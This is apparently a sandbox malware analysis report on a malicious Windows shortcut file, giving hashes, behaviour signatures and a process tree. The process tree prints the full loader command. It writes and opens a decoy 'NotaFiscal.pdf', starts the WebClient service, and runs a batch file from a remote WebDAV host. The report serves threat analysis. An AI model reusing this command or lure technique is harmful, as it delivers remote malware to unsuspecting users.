Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    09/05/2024, 08:32

General

  • Target

    f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk

  • Size

    2KB

  • MD5

    7b5db2de0a2d91a0e6f83080e8dd0d6e

  • SHA1

    5a370fa094efe972929d1e6dc604162821da698b

  • SHA256

    f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747

  • SHA512

    2f816236825717d5aa942898f8320e73883364d76a2fd36c935f9b21f7c034f5176ed2365ff9157e7ccc4e7bbf1b1e1af40c0811619fe481b28fcf0c07f9080c

Score
4/10

Malware Config

Signatures

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" "/min /c "echo Visualizacao indisponivel > C:\Users\Admin\\downloads\\NotaFiscal.pdf && start C:\Users\Admin\\downloads\\NotaFiscal.pdf && start sc start webclient && ping localhost -n 7 && start /min cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"
        3⤵
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:2672
      • C:\Windows\system32\sc.exe
        sc start webclient
        3⤵
        • Launches sc.exe
        PID:1980
      • C:\Windows\system32\PING.EXE
        ping localhost -n 7
        3⤵
        • Runs ping.exe
        PID:2572
      • C:\Windows\system32\cmd.exe
        cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat
        3⤵
          PID:2348

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

      Filesize

      3KB

      MD5

      f7990247e022bf5b7d09e633ff0f6e6d

      SHA1

      d2511e80ca516481bda9a0bf13bd45b441c3e780

      SHA256

      fd352a2335b720596c93bdf0a5fbe8f285e3bf46d5c8f227ccbfab80e6afa701

      SHA512

      baa35aa38e742cbc3e74b9f8cd95c1f22a698590d5d598d6030c2dd1ebbad3e9cb2bc3082cfeb19ca632eee03818fcbbdd68531119c9ae1a9a6a4c3406ee21e9

    • C:\Users\Admin\Downloads\NotaFiscal.pdf

      Filesize

      29B

      MD5

      823a9caa296579d6a40cd5195d969727

      SHA1

      5592813787ecff9133229439498d624339c07ece

      SHA256

      60b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e

      SHA512

      77ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc